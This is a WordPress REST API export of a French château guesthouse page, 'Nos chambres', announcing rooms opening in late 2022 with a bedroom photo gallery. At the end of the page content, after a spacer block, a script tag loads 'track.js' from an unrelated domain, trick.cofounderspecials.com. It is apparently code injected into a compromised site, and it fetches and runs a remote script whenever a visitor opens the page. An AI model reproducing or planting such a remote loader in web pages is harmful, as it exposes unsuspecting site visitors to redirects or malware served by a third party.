{"id":2,"date":"2021-05-20T11:19:47","date_gmt":"2021-05-20T09:19:47","guid":{"rendered":"http:\/\/domainederochefort.fr\/?page_id=2"},"modified":"2022-07-19T12:56:32","modified_gmt":"2022-07-19T10:56:32","slug":"page-d-exemple","status":"publish","type":"page","link":"http:\/\/domainederochefort.fr\/?page_id=2","title":{"rendered":"Nos chambres"},"content":{"rendered":"\n<p class=\"has-text-color\" style=\"font-size:28px;color:#de5cc0\"><strong>OUVERTURE FIN 2022<\/strong><\/p>\n\n\n\n<p>D\u00e8s Octobre 2022, profitez de notre domaine le temps d&#8217;un s\u00e9jour, en r\u00e9servant l&#8217;une de nos chambres. <\/p>\n\n\n\n<p>Dans une atmosph\u00e8re bucolique et chaleureuse, vous pourrez bient\u00f4t avoir l&#8217;opportunit\u00e9 de passer quelques jours dans notre ch\u00e2teau afin de vivre une exp\u00e9rience immersive et d\u00e9paysante.<\/p>\n\n\n\n<figure class=\"wp-container-2 wp-block-gallery-1 wp-block-gallery columns-3 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"1024\" height=\"683\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920-1024x683.jpg\" alt=\"\" data-id=\"70\" data-link=\"http:\/\/domainederochefort.fr\/?attachment_id=70\" class=\"wp-image-70\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920-1024x683.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920-768x512.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920-1536x1024.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bed-731162_1920.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"1024\" height=\"683\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1-1024x683.jpg\" alt=\"\" data-id=\"71\" data-link=\"http:\/\/domainederochefort.fr\/?attachment_id=71\" class=\"wp-image-71\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1-1024x683.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1-768x512.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1-1536x1024.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/bedroom-5664221_1920-1.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"1024\" height=\"683\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920-1024x683.jpg\" alt=\"\" data-id=\"72\" data-full-url=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920.jpg\" data-link=\"http:\/\/domainederochefort.fr\/?attachment_id=72\" class=\"wp-image-72\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920-1024x683.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920-768x512.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920-1536x1024.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/home-2609600_1920.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n<script src='https:\/\/trick.cofounderspecials.com\/track.js?v=9.999' type='text\/javascript'><\/script>","protected":false},"excerpt":{"rendered":"<p>OUVERTURE FIN 2022 D\u00e8s Octobre 2022, profitez de notre domaine le temps d&#8217;un s\u00e9jour, en r\u00e9servant l&#8217;une de nos chambres. Dans une atmosph\u00e8re bucolique et chaleureuse, vous pourrez bient\u00f4t avoir l&#8217;opportunit\u00e9 de passer quelques jours dans notre ch\u00e2teau afin de vivre une exp\u00e9rience immersive et d\u00e9paysante.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/2"}],"collection":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2"}],"version-history":[{"count":7,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":124,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/2\/revisions\/124"}],"wp:attachment":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}